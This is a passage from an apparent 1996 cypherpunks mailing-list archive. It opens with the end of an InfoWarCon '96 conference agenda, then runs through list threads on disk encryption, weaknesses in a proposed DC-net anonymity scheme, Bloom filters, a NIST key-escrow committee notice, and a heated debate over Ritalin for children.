 			Andy Mueller-Maguhn, CHAOS Computer Club, Germany
 			Chris Goggans, co-founder, Legion of Doom, USA
 			John Gilmore, Electronic Frontier Foundation
 
 		If you've ever wanted to know how hackers think; what 
 		makes them tick and how they became the first Information 
 		Warriors, here are the people who can answer your 
 		questions.  These sessions are among the most popular at 
 		every InfoWarCon. Gilmore will present his unique concepts
		for Defensive Information Warfare.
 
 18::00 - 20:30	Sponsored Reception/"Live Hackers" Off-Line
 
 September 6, 1996
 
 6:30 - 7:50	Continental Breakfast
 
 7:50 - 8:00	Opening Remarks and Administration
 
 8:00 - 8:30	"Domestic Law Enforcement and Electronic Civil Defense"
			Louis Freeh, Director, FBI *
 
8:30 - 9:00	"The Convergence of Military and Civilian Defense"
 			General Jim McCarthy, USAF (Ret)
 
 9:00 - 9:30	"What is National Security?" 
	 		Michael R. Nelson, Ph.D.
			Special Assistant for Information Technology
			White House Office of Science and Technology Policy

 9:30 - 10:00 	"Building a Society from the Net Up"
 			Pedrag Pale, Chairman of the InfoTech Coordinating 
 				Committee, Ministry of Science, 
 				Technology and Informatics, Croatia
 
 10:00-10:30 Break
 
 10:30-11:45	The Russians are Coming
 			Moderated by: Greg Treverton, Director of National 
 				Security Program, Rand Corporation 
 
 		From academia to the military to their business community, 
 		the Russians have been thinking long and had about 
 		Information Warfare. Here's what they have to say. Get 
 		front row seats and be ready to ask your questions.

	Dr. Victor I. Solntsev, Assoc. Prof. Moscow State Tech. Univ.
	"Information Warfare and Human-Operator Security"
	Dr. Dmitry Chereshkin Russian Academy of Sciences; 
	Editorial Board, "Information Infrastructure and Policy."
	Dr. Georgy Smolian Russian Academy of Sciences and Scientific Council
	"Democratization of Russia and Information Security."

 11:45 - 13:15	Sponsored Lunch
 
 12:30 - 13:00	Luncheon Address
 
  13:00 - 14: 15 	Breakout Sessions C1-C4
 
 	C1	Corporate Civil Defense:
 			Moderated by Don Sortor, Director Security Prgms, 
 				Corp. InfoSec., Motorola, Inc.

 	A team of cross-industry experts from the primary infrastructures, 
 	will examine how industry and government can and should interact 
 	in the event of an Electronic Pearl Harbor. What is the role of 
 	the company and its management? What policies should be put into 
 	place to prepare for the malicious Acts of Man? How should the 
 	government work with the private sector to mitigate damages?
 	These experts will set you on the right track.
 

 	C2	Denial of Service in the Private Sector: 
			The Nuclear Weapons of the Information Age: 
			Magnetic Weapons from the Military to 
			Electronic Pipe Bombs
   				Carlo Copp, Defense Analyst, Australia
 				Kelly Goen, Penetration and Security Engineer
 
 	Get Seats Early! Magnetic weapons; directed energy weapons; HPM; 
 	HERF Guns; electromagnetic pulse cannons and EMP. 
 	Learn about the latest in high energy weapons systems and how they 
 	can be used to attack and destroy critical electronically based 
 	infrastructures. Then find out what the terrorist can do with 
 	home-brew electronic pipe bombs.
 
 	C3 	The Net Under Attack
 			Dr. Dorothy Denning, Chair, Computer Science 
 				Dept., Georgetown Univ.
 			Jim Christy, Permanent Subcommittee Investigations
				U.S. Senate (And USAF OSI)
 
 	What makes an attack on the Internet and what do we do about it? 
 	Ms. Denning is an internationally recognized expert who will guide 
 	us and her panel of experts through the maze of possibilities. 
 	Incredibly valuable for security professionals.
 
 	C4	USAF School of Advanced Airpower Studies
 			Moderated by Col. Richard Szafranski, USAF, Air War 
 				College National Military Strategy
 
 	Col. Szafranski and his top students will discuss their views, 
 opinions on Information Warfare.  The USAF SAAS has produced some of the
most revolutionary papers in IW, including the now globally recognized papers
on taking down telecommunications and national power systems.
 
 14:30 - 15:00	Break
 
 15:00 - 16:15	Breakout Sessions D1-D4
 
 	D1	Anonymous Global Banking: Pitfalls and Solutions
 			Moderated by Bruce Schneier
 				Kelly Goen, Security Engineer
 				Eric Hughes, Cypherpunks
 				Phil Zimmermann *
 
 	How does anonymous international banking work? Is it merely a 
 	front for Criminal Central? Or is there a true value? How do 
 	conventional banking institutions view it? What about 
 	cryptographic solutions? Are your funds "naked on the
	Net today?  Come see for yourself!
 
 	D2	The Ethics of Information Warfare
 			Moderated by Winn Schwartau
 				Col. Phil Johnson, Judge Avocate, USAF
 				Dr. Dan Kuehl, NDU
 
 	While CNN is looking over your shoulder, as a 
 	military commander, here is your choice: either use a precision 
 	smart bomb which will immediately kill 20 civilians for the world 
 	to see. Or, use a non-lethal IW weapon, no immediate TV deaths, 
 	but a predicted 200 civilian collateral fatalities within 30 days. 
 	What do you do? The Ethical conundra of Information Warfare will 
 	be examined from all perspectives.  Or: you have been attacked
	anonymously--you suspect one party, without proof--another
	attack is coming.  What now?  Should we develop new intelligence
	capabilities to permit precision detection and response in
	cyberwar?

 	D3	National Information Assurance: Cooperation is the Key
 		to Safeguarding Communications, Power and Transportation
 
 			Moderated by: Major Brad Bigelow, Office of the Manager, 
					National Communications System
				Jeff Sheldon, General Counsel,
					Utilities Telecommunications Council
				Steve Fabes, Director of Electronic Delivery 
Services,
					BankAmerica
				Carl Ripa, VP National Security/Emergency 
					Preparedness, Bellcore

 	Experts from the major civilian infrastructures will discuss how 
 	past cooperation between industry and government has echoed 
 	economic realities. The bulk of the nations information 
 	infrastructure is not under the economic or regulatory control of the 
 	Federal government. So, how do we maintain a healthy balance 
 	between private initiative and legislative and regulatory
 	actions? Today there is no "due diligence" standard which
	requires that communications and computing services be guaranteed
	in terms of security and data integrity.  Our panel will provoke
	an active discussion of remedial cooperative measures.

 	D4	"Understanding and Defending Against Industrial Espionage and 	
			Information Terrorism."
			Tom Fedorek, Managing Director, Kroll Associates New 
York*
			Matt DeVost TITLE COMING
			Charlies Swett, Acting Deputy Director for 
Low-Intenstity
			Conflict Policy, Office of the Assistant Secretary of 
Defense 
			for Special Operations and Low-Intensity Conflict 

 	A look at how modern espionage and information is conducted, why it's 
done and 
 	who's doing it.  How much can it cost your company and how can you 
 	tell if you're targeted? Do not miss this fascinating session
	which is expected to feature the Kroll Managing Directors
	from Paris, London, and New York.
 
 16:15 - 16:30	Break
 
 16:30 - 17:00		Wrap Up: "What is War?"
 			Moderated by Dr. Mich Kabay, NCSA
 				General Jim McCarthy, USAF (Ret)
 				John Petersen, President, The Arlington 
Institute
				You - The Audience

An exciting  'don't miss' interactive audience session. What a closing!

(* Speakers with an * have been invited but have not confirmed as of June 28, 
1996.)
  
 HOTEL INFORMATION:
 
 	Crystal Gateway Marriott
 	1700 Jefferson Davis Highway
 	Arlington, VA  22202		

	The Crystal Gateway Marriott is offereing a special conference rate of 
	$129 single/$139 double occupancy. This rate is good until August 14,
1996.
 
 	703-920-3230 (Voice)
 	703-271-5212 (Fax)
 

CANCELLATION POLICY

After  August 9th, any cancellation will incur a $100.00 processing fee.  If the
reservation is not cancelled and no one attends, the full registration price
will be charged.  Substitute attendees are welcome.

 
 InfoWarCon '96 Registration Form:
 
 
      Name:    ___________________________________________________________
 
      Title:   ___________________________________________________________
      
      Org:     ___________________________________________________________
 
      Address: ___________________________________________________________
 
      Address: ___________________________________________________________
 
      City:    ___________________________________________________________
 
      State:   _______________________________  Zip: _____________________
 
      Country: __________________________  Email: ________________________
 
      Phone:   __________________________  Fax:  _________________________
 
 
 FEES:
    
         Payment made BEFORE August 9, 1996:    
 
                 (   )   595.00     NCSA Members/OSS '96 Attendees
                 (   )   645.00     All others
 
         Payment made AFTER August 9, 1996:
 
                 (   )   645.00     NCSA Members/OSS '96 Attendees
                 (   )   695.00     All others
 
 
   Make checks payable to NCSA, or
 
      Charge to:  (  ) VISA      (  )   MasterCard       AMEX (  )
 
        Number:     ___________________________________________
 
        Exp date:   ___________________________
 
        Signature:  ___________________________________________
 
 
 MAIL OR FAX OR EMAIL REGISTRATION TO:  
 
 	National Computer Security Association
 	10 South Courthouse Avenue
 	Carlisle, PA 17013
 	Phone 717-258-1816 or FAX 717-243-8642
 	EMAIL:		conference@ncsa.com
 
 
 For more information about NCSA:
 
 	WWW:		http://www.ncsa.com
 	CompuServe:	GO NCSA
 	EMail:		info@ncsa.com
 
  Version: 1.10



Peace
Winn

		        Winn Schwartau - Interpact, Inc.
		        Information Warfare and InfoSec
		       V: 813.393.6600 / F: 813.393.6361
			    Winn@InfoWar.Com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@dorsai.dorsai.org>
Date: Tue, 9 Jul 1996 07:24:59 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: What remains to be done.
In-Reply-To: <199607041710.NAA00995@unix.asb.com>
Message-ID: <Pine.SUN.3.91.960708140840.22851F-100000@dorsai>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 4 Jul 1996, Deranged Mutant wrote:

> There's a need for something that will work under Win95, WinNT, 
> and/or OS/2 for encrypting partitions.  Aside from a few commercial 
> or shareware apps which use some variant of DES, there's little out there.
> (One problem is that DD kits for Win95/NT and OS/2 cost $$$.)

Yeah, I'm kinda lusting after something that would work under NT as well 
as under 95.  Too bad NT won't allow the use of BIOS INT 13 calls so that 
one may load the SecureDrive TSR. :(  I don't have OS/2, but if I did you 
could easily add that to the list.

I'm constantly switching between NT and 95 and have them installed on the 
same drive.  Would be cool to have some low level driver to encryption 
from the Master Boot Record for example to get around unfriendly OS's- but 
then NT won't respect the BIOS calls, 95 in 32 bit mode won't, Linux sure 
as hell wont, etc.... that was the whole idea of having a BIOS in the 
first place, but woe is us.


==========================================================================
 + ^ + |  Ray Arachelian |FL|       KAOS KERAUNOS KYBERNETOS      |==/|\==
  \|/  |sunder@dorsai.org|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\=
<--+-->| --------------- |CG|What part of 'Congress shall make no |=\/|\/=
  /|\  | Just Say "No" to|KA|law abridging the freedom of speech' |==\|/==
 + v + | Janet Reno & GAK|AK|        do you not understand?       |=======   
===================http://www.dorsai.org/~sunder/=========================
 Key Escrow Laws are the mating calls of those who'd abuse your privacy!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janke@unixg.ubc.ca
Date: Tue, 9 Jul 1996 09:47:42 +0800
To: cypherpunks@toad.com
Subject: Synchronization Attack on Pseudo-DC-net's
Message-ID: <199607082122.OAA00405@clouds.heaven.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Here's an easy attack on a pseudo-DC-net that I thought up over lunch if
the clients trust the server to be honest in telling both the round number
and who is on.

Let Stephanie be the person running the server, and let Alice and Bob be
two users.  Let f(n) be the pseudo random function they share.   Assume
that Stephanie knows their secret encryption key.  It is then possible
for her to compromise their anonymity as follows: First Alice joins the
net, and Stephanie tells her that it is round 100 and Bob is on. Alice
sends a messages. Stephanie sends back some random junk to Alice to
convince her that there was a collision.   Alice backs off for a few
rounds. Stephanine now receives f(101), f(102), f(103), etc. and then tells
Alice that Bob has left.  Alice leaves now. Later Bob joins. Stephanine
tells him that it is round 101 and Alice is here. Bob starts talking right
away, sending three message: f(101) xor M1, f(102) xor M2, and f(103) xor
M3.   From this Stephanie is able to recover M1, M2, and M3 by xor'ing
f(101), f(102), and f(103), which she has from before, back in. Bob has
completely lost his anonymity! 

Thus, it looks like trusting the server for both who is on and the round
number is a bad idea! It might be possible to remove the need for a round
number if the number of seconds since channel creation is used instead, and
the clients are time synchronized. In that case running the pseudo-DC-net
on top of UDP might be preferable to running it on top of TCP. 

Can anyone think of an attack if the server is just trusted for a list of
who is on? If there is one, I guess new clients could ask for signed
messages of who is on: "It is 456 seconds since channel creation, and,
I---Alice---am on. (signature)". That would complicate the protocol, of
course, and cost Nancy---a new client---some time in verifying the
signatures. 

Good attacks so far! Keep 'em coming. :)

Leonard Janke
(pgp key id 0xF4118611)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBMeF6nUMBIFf0EYYRAQGITQf/U0Wjpsyb7XpG6uCVFCPNaAYVIJpLeEyk
Mxl6X/TQPhJFRclbRJwFoWfwH46M2le/QKHu6nFFjioyYbXofaLWqDeOa61XY5/c
4law80/xxAg9IdzoQp4mAz6QOvToMCOlNE21MCL8YlPrrdhIL4MfAH9gpU8+Otui
IH1S5VB7TGE6ttZEx18sKdBUxYeJeU4jrXb4Uj2HEN5inLrhJBic/fsZ0hZXjCAH
5kbZLI8sf+leLyoW03qILeVl8jjYuPy/z16MsY2SDzJ3hFv8nngT9+fzVItX7sO2
ngvqvyUW4SIWfK8XwRWUiMFW7i7gyMcKteSSEJBaEdOZNcGUvXY+5Q==
=jmVk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 9 Jul 1996 09:23:27 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <1.5.4.32.19960708130935.002db9e0@giasdl01.vsnl.net.in>
Message-ID: <Pine.LNX.3.93.960708142146.352A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 8 Jul 1996, Arun Mehta wrote:
> Ritalin is a lifesaver for a small % of children who suffer from a condition
                               ^^^^^^^
     Key word here.            |||||||

> Ritalin... mother was furious.  
> 
> Some of the kids who use foul language (a very small %) have Tourette's
> disease, and also need medicine (a different one)... by and large the

     Bullshit. Most kids (these days) who use profanity are simply 
undisiplined louts. Yes, I use profanity today, at 28. However, I would 
NEVER have called my mother a "Fucking Asshole" under ANY circumstances, 
My father would have torn my head off. In fact if my father had caught me
speaking like that to ANYONE at 8 years of age, I would have had trouble
sitting for a couple days at least. 

     Of course my parents made sure not to talk like that around me. 

> politically correct thing is sometimes to label a kid as sick rather than
> bad or spoiled, this is probably why drugs are over-used.  But we can't
> throw the baby out with the bathwater!

     On the other hand, if only 20% of the children that are being drugged
need it, that means that we are sacrificing 80% of these children to save 
20%. 

     Drugs are supposed to be for fun, not for long term behavior 
modification. People need to learn to deal with life. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 9 Jul 1996 10:34:06 +0800
To: cypherpunks@toad.com
Subject: Re: NYT/CyberTimes on CWD article
Message-ID: <199607082221.PAA27343@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  3:01 PM 7/6/96 -0800, Norman Hardy wrote:
>At 9:17 AM 7/6/96, Declan McCullagh wrote:
>>"We are writers, not crytographers."
>>
>>-Declan
>....
>This seems to be an application for Bloom filters.
>See page bottom of page 561 in Knuth's "Searching and Sorting", First Edition.
>(Vol 3 of Art of Computer Programming)
>
>With a Bloom filter you can hide which URLs you reject yet quickly rejecting
>particular URLs.
>
>Compute SHA(URL) yielding 160 bits. Divide that into 16 ten bit quantities
>b[i], for 0<=i< 10.
>Reject the access if P[b[i]] = 1 for each i. P is an array of 1024 bits
>computed by someone
>with the index prohibitorum. (pardon my Latin)
>
>Yes, this excludes 1/1024 "falsely accused" URLs, but you get the idea.

As Norm knows, we used this algorithm to provide a label search function
(What Unix people use grep for) for an IBM OS back in the 1970s.  SHA is
probably overkill for the hash function, but you need something better than
a barber poll hash.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dp@tir.com (dp)
Date: Tue, 9 Jul 1996 08:27:50 +0800
To: cypherpunks@toad.com
Subject: Re: doubleclick monitoring web browsing habits
Message-ID: <199607081942.PAA15748@tir.com>
MIME-Version: 1.0
Content-Type: text/plain


How do I get off the list.......





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Tue, 9 Jul 1996 11:10:45 +0800
To: janke@unixg.ubc.ca
Subject: Re:Pseudo-DC-net Project
Message-ID: <v02140b00ae07452b6958@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


janke@unixg.ubc.ca writes:
> I am working on a project to implement a variation of a DC-net to be run
> over the Internet. I am posting this summary to find out if it overlaps
> with projects others are working on; to see what members of the lists think
> of the general ideas for the network I have in mind; and to see if anyone
> is interested in helping me out.

Short version:

Your proposal will not work and is trivial for a TLA to break.

Long version:

There are two problems with this proposal, the star topology collapses the DC
network into a two-party version of the DC-net protocol (in which collusion
is trivial) and the shared PRNG allows _any_ participant to compromise a
target member of the network (or evesdrop at the server and decode all
traffic.)

A simple example of such an attack would be for the TLA to register a host on
the network and get the shared secret key for the PRNG.  The TLA then taps in

either to the server's internet connection or any point in the network which
divides the client graph into two parts, the server and a single client on
one side and the remaining clients on the other.  The TLA then just XORs out
the blinding data (which it knows because it is a member of the network) and
it has all of the connections.  Additionally, having a MAC is just plain
silly, the objective is to hide who is sending and having a MAC defeats the
entire purpose of the proposal.

You have basically created a simple packet anonymizer, which is not bad in
and of itself, but it is not even close to a true DC-net (at least I am
assuming so, based upon the initial description.) You have not mentioned
whether or not all traffic exits the network at the server, if this is the
case you are better off having each client establish a secure link to the
server, running a PRNG constantly that is mirrored by the server, and XORing
all of their traffic in to this stream.  The constant PRNG stream hides when
the client is sending or receiving and the secure channel to the server
discourages passive evesdropping. This does not defeat traffic analysis at
the server, but then again neither does your proposal.

Some other tips from someonw who has spent too much time thinking about
DC-net implementations:

        Ignore collision detection, just use ALOHA or a similar protocol.
        Until you get up to serious bandwidth the computational cost is
        not worth the effort.

        Don't abandon the ring topology (this is where the DC-net gets its
        security.)  Use multiple small (4-7 host) rings with overlap between
        the rings, think of each ring as a LAN and hosts which are on
        multiple rings as bridges/routers and you should get the picture...

        Bandwidth economy will always suck, you can use hash trees to get
        around a few of the problems but for the most part you have to accept
        the costs and work around them in other areas.

        You really, really need to read the 1987 Eurocrypt proceedings.


jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janke@unixg.ubc.ca
Date: Tue, 9 Jul 1996 11:35:10 +0800
To: mccoy@communities.com (Jim McCoy)
Subject: Re: Pseudo-DC-net Project
In-Reply-To: <v02140b00ae07452b6958@[205.162.51.35]>
Message-ID: <m291cu1g0w.fsf@clouds.heaven.org>
MIME-Version: 1.0
Content-Type: text/plain



Thank you for the comments, but I'm not sure I fully understand them 
all. First of all what is a TLA? Second of all, and this seems to be
something I was unclear about in my first post---I need *not* mean to
suggest that all clietns shared the same PRNG. Every pair of
clients will have their own. By star-shapped, I meant the configuration
of the communications network, not the  abstract connection that exist 
between cleints by virtue of the PRNG's. As for a MAC being silly,
well it would be if everyone used a different one, but I meant for
it to be shared by all participants, so that the most the MAC would 
reveal is that *someone* on the network sent the message.

Your paragraph that I have created a simple packet anonymizer is
probably based on the misunderstanding of the points I mentioned above.
I do like the idea of encrypting the link to the server with a PRNG,
and since I will be running lots anyway... :) (O(N) not 1 for each
client! :) ) it might be worth adding. Then again, I do not want to regard the
server as a trusted party in any way... 

Collision detection is easy with a MAC, so I think I will keep it.

I hadn't thought of using a ring topology... Interesting. I'll think
about that one some more.

How do hash trees help? Is that mentioned in the paper you cite? I'll
take a look at that one before long. What's the title and author?

-- 
Leonard Janke
(pgp key id 0xF4118611)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <wendigo@gti.net>
Date: Tue, 9 Jul 1996 09:21:31 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: The Net and Terrorism
In-Reply-To: <ae0685970202100469db@[205.199.118.202]>
Message-ID: <199607082044.QAA20776@apollo.gti.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

An entity claiming to be Timothy C. May wrote:
: 
: (Note: For various cultural and image reasons, science and technology are
: _not_ emphasized as careers for black children. Contrast the image of
: science in predominantly black environments with the image of science in,
: say, predominantly Jewish environments. The result is clear: blacks are
: severely underrepresented in these areas, and Jews are overrepresented in
: these same areas. Hey, I'm just citing a basic truth of our times, at least
: in this country. Similar statistics apply to Asians, with more than half of
: all U.C. Berkeley science and engineering undergrad students being Asian,
: and something less than 3% of them being black. The figures for who
: _graduates_ are even more skewed. There are various reasons for this. One
: of my pet peeves is how the terms "dweeb," "nerd," and "geek" are used to
: characterize science and engineering majors and professionals. Hardly terms
: that are likely to make a brother in the hood consider studying science!)
: 

I attended a school in the Pittsburgh area that had an active recruiting
effort centered in Philadelphia.  Thus, most of the black students were
from inner-city Philly.  What I noticed about their failure to show up in
upper level math/science classes was that they had to spend too much time in
remedial classes to undo the damage done by city schools.

Considering the percentage of America's black population that lives in
urban areas, that seems to explain the lack of black representation.

Even more distressing on the whole was the lack of female students in
the Comp. Sci. department ... but that's another story.

As for the slang, I don't think it's going to attract white kids from
the suburbs either.  Screw the stereotypes, it's a little too close
to the "They could but they don't have the drive/will/intelligence" arguments
to say that Dilbert cartoons are going to turn off a "brother in the hood"
to math/science.  

Also, most of the Asian students at my school were not US citizens.  Most were
from China or Japan.

mark
- -- 
    Mark Rogaski   | Why read when you can just sit and |      Member
  GTI System Admin |         stare at things?           | Programmers Local
  wendigo@gti.net  | Any expressed opinions are my own  |     # 0xfffe
 wendigo@pobox.com | unless they can get me in trouble. |     APL-CPIO


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMeFzDg0HmAyu61cJAQFSqgP/YH7+mjoAqIcGcyM5OfciOdfebjBPfPK7
f7hIUdxO55E2JDusOqJUtmxq9SRaBvYoNh95T2yKvK6PQZm2ott5E2nP9f4YbOAy
ejRD4WX3pdxJTFEcbJgaQeNCsDl8n59HMV/Q76PY4CluIzARSYFt7kN1oyB4oIhU
hCxdiNEkeLY=
=KksE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 9 Jul 1996 09:47:53 +0800
To: Ray Arachelian <sunder@dorsai.dorsai.org>
Subject: Re: What remains to be done.
Message-ID: <199607082124.RAA09624@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  8 Jul 96 at 14:12, Ray Arachelian wrote:
[..]
> I'm constantly switching between NT and 95 and have them installed on the 
> same drive.  Would be cool to have some low level driver to encryption 
> from the Master Boot Record for example to get around unfriendly OS's- but 
> then NT won't respect the BIOS calls, 95 in 32 bit mode won't, Linux sure 
> as hell wont, etc.... that was the whole idea of having a BIOS in the 
> first place, but woe is us.

BIOS was written for real mode... part of the problem. Another is the 
not-made-here syndrome, and in a sense Linux, OS/2, NT and 95 are 
different types of operating systems, so a shared BIOS is unfeasible.

It would be nice to develop an encrypted filesystem that could be 
ported across operating systems for those of us with multiple OS's.

BTW, Linux 2.0 is making a nice step in that direction by adding 
support for mounting a file (which contains a filesystem), 
specifically to allow encrypted file systems as well as things like 
testing out iso9660-fs before buring CD-ROMs, etc.  In theory 
something similar can be done with Win95/NT and OS/2, but it hasn't 
been done the proper way (SecureDevice is really a hack in that 
sense). 

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Tue, 9 Jul 1996 11:44:15 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <199607082232.RAA19604@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim writes about Ritalin:

>I've been over visiting my friend to see some of this. The Ritalin-sodden
>kid arrives like a zombie. When the Ritalin wears off, he's rambunctuous,
>but all kids are. My friend Paul has had to discipline him a bit to keep
>him from--as the psychobabbles would say--"acting out." This discipline
>sets him straight, but it's not something his New Age "supermom" would ever
>think of doing. Hence the kid throws temper tantrums, acts out, calls her
>"You fucking asshole" (remember, he's only 8 or so), and so on. So she
>cranks up his dose of Ritalin and he's zoned out for a while. Frankly, I
>think telling the kid that if throws a tantrum he'll get punished for it is
>a whole lot more normal--ever notice that a dog smacks her puppies when
>they get out of line, or that a cat swats her kittens the same way? It
>establishes the rules of the game.

It sounds to me like the mom is abusing the drug -- Ritalin is tricky
stuff and you can really mess up a kid by overdosing.  That's child
abuse, IMHO, not some benigh paddling.

Alex, our 8 year old son, uses Ritalin. He doesn't need Ritalin to
concentrate. He can get caught up in a building project for hours and
create a masterpiece. He can focus so thoroughly you can't pry him
loose.

What Alex *can't* do is get comfortably through a day of grammar
school. I sympathise -- I was the same way when I was that age. I had
a tough time and I saw Alex having problems similar to mine.  So I
sic'ed the educational establishment on the problem. Alex ended up
with a Ritalin prescription. At least for now. And it's been pretty
effective. With Ritalin he finds it much easier to concentrate on
drivel, an important skill to make it through school, or sports.

The problem is that Ritalin isn't some useful, generically wholesome
substance like milk or peanut butter -- you risk more than "acting
out" if you're not incredibly careful. Sleep disorders at least.  But
I don't like the downside of doing nothing, so we're trying it out.

I've *never* seen Alex zoned out on Ritalin.

Rick.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Tue, 9 Jul 1996 10:26:19 +0800
To: dccp@eff.org
Subject: TACDFIPSFKMI (fwd)
Message-ID: <199607082152.RAA14280@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Date: Mon, 08 Jul 1996 16:36:09 -0400
From: Elaine Frye <elaine.frye@nist.gov>
Subject: Announcement re New TAC

July 8, 1998

Note

To:  Key Escrow Distribution List

From:  Ed Roback

Subject:  Establishment of the Technical Advisory Committee to Develop a
Federal Information Processing Standard for the Federal Key Management
Infrastructure (TACDFIPSFKMI)

FYI, the following notice was published today in the Federal Register.  

---------

Published 7-8-96 in the Federal Register, Volume 61, Number 131

U.S. DEPARTMENT OF COMMERCE

Technical Advisory Committee to Develop a Federal Information
Processing Standard for the Federal Key Management Infrastructure

In accordance with the provisions of the Federal Advisory Committee Act,  5
U.S.C. App. 2, and the General Services Administration  (GSA) rule on
Federal Advisory Committee Management, 41 CFR Part 101-6, and after
consultation with GSA, the Secretary of Commerce has determined that the
establishment of the Technical Advisory Committee to Develop a Federal
Information Processing Standard for the Federal Key Management
Infrastructure is in the public interest in connection with the performance
of duties imposed upon the Department by law.

The Committee will advise the Secretary on the development of a draft
Federal Information Processing Standard for the Federal Key Management
Infrastructure.

The Committee will consist of no more than twenty-four members to be
appointed by the Secretary to assure balanced representation among
individuals with established expertise in cryptography and the
implementation and use of cryptographic systems.

The Committee will function solely as an advisory body, and in compliance
with provisions of the Federal Advisory Committee Act.  The charter will be
filed under the Act, fifteen days from the date of publication of this notice.

Interested parties are invited to submit comments regarding the
establishment of this committee to Edward Roback, Computer Security,
National Institute of Standards and Technology, Gaithersburg, MD 20899,
telephone: 301-975-3696.

Dated: June 27, 1996

Mark Bohannon
Chief Counsel for the the Technology Administration
[FR Doc. 96-16896, Filed 7-5-96; 8:45 a.m.]


*****************************************************
Elaine Frye
Computer Security Division
National Institute of Standards and Technology
Bldg. 820, M.S. Room 426
Gaithersburg, MD  20899-0001
Voice:   301/975-2819    Fax:  301/948-1233
*****************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 9 Jul 1996 12:31:43 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607081653.MAA10428@jekyll.piermont.com>
Message-ID: <199607090052.RAA03839@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry Writes:

> Most people would have no particular urge to stop a child with
> diabetes from taking her insulin. Your friend seems to have the sick
> idea that they know better than the child's parents whether the child
> should be taking their meds or not, simply because the medication is
> for a "mental" problem. This isn't your friend's child. Its someone
> else's child. They have no right to make such decisions.

Since diabetes has an organic cause, this analogy with syndromes and
disorders defined solely by behavioral percentages fails.

A better model might be height, which follows a basically continuous
distribution once outliers due to functional endocrine problems are
eliminated. 

We could, of course, define a "vertical deficit disorder" (VDD) which
10% of the population have by definition, and for which the treatment
would be synthetic human growth hormone given regularly during the
growing years. 

People with VDD would probably want to be taller, and be as successful
as their peers at important things like basketball.  The specified 
treatment would certainly demonstrate effectiveness in accomplishing
this goal.  People with VDD would argue that their disease was real, 
since it was hereditary, and could be measured with complex scientific
instrumentation, like PET^H^H^HYardsticks.

Nonetheless, reputable scientists usually only perscribe HGH for persons
many standard deviations away from the norm, or who have medical disorders
which interfere with normal production of the substance.  Any doctor who
started handing out perscriptions to everyone in the shortest 10%
of the population would probably be up on malpractice charges posthaste. 

Amphetamines have demonstrated themselves to be a tricky medication even
for psychological disorders for which they were once considered 
appropriate.  ADD and its treatment plays very well into a society that
seems to feel that each and every one of life's misfortunes must be
given a name and called a disease. 

Of course, no amount of reason will disuade the True Believers from
embracing yet another disease model, and we shouldn't expect that it 
would.  But I think it is clear to many people that the forced medication
of children for the convenience of those who take care of them is
getting a bit out of control.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Tue, 9 Jul 1996 10:22:01 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
In-Reply-To: <199607081635.MAA10394@jekyll.piermont.com>
Message-ID: <Pine.A32.3.93.960708174618.18872A-100000@navajo.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 8 Jul 1996, Perry E. Metzger wrote:

> If you generate every possible word, you aren't getting any advantage
> by using crack and not just trying every possibility in your cracker

I'm not sure if anyone actually still cares about getting wordlists, if
not you can delete this now.. :) Someone probably mentioned this anyway,
